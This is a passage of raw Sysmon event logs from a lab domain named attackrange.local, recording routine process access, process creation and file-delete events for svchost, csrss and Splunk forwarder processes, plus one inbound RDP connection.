781 10341000x8000000000000000977494Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977493Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977492Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977491Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977490Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977489Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977488Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8957-6151-9979-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977487Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8957-6151-9979-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977486Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.967{69CF5F33-8957-6151-9979-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977485Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.779{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71BCD5ED3052B02E2DA8B777E135B02E,SHA256=C9B13BF7E204088F7F11FBFA20C8B25B38507AA705E3C2F694B8F0D3E9695E0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977484Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:24.237{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-28137-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:27.103{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1D6BFF6727964B86D31E0881BE8AD2F,SHA256=78AA636C9D6948F77AAB8D98A6CC29ECD27ABDB11FB95F0B0A13803E3B4B35AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977483Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8957-6151-9879-00000000FD01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977482Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977481Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977480Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977479Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977478Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977477Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977476Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977475Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977474Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977473Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8957-6151-9879-00000000FD01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977472Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.294{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8957-6151-9879-00000000FD01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977471Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.280{69CF5F33-8957-6151-9879-00000000FD01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977514Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.685{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25691C7AF80C91839BAFB01C02103264,SHA256=D611C0F40C207AFBC7F84211A5F5C56EF79AEF0A621AA8F140EA7C548D5871C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977513Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8958-6151-9A79-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977512Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977511Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 